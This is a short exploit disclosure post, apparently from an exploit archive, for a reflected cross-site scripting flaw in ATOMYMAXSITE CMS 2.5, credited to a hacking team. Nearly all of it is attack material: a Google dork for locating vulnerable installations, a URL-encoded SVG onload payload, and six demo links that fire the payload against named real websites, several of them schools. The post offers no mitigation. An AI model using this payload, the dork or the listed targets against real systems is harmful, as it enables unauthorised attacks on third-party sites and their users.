ATOMYMAXSITE 2.5 Cross Site Scripting
Posted on 25 December 2015
###################### # Exploit Title : ATOMYMAXSITE CMS Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://maxtom.sytes.net/ # Google Dork : "Power by : ATOMYMAXSITE 2.5" OR Powered by ATOMYMAXSITE 2.5 # Date: 2015/12/23 # Version = 2.5 ####################### # Payload : ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team # # Demo: # #http://www.phetchabun2.com/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team # #http://www.edu.ubru.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team # #http://www.ppaosportschool.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team # #http://www.wangdan.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team # #http://www.nonswang.org/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team # #http://www.cpmpoly.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################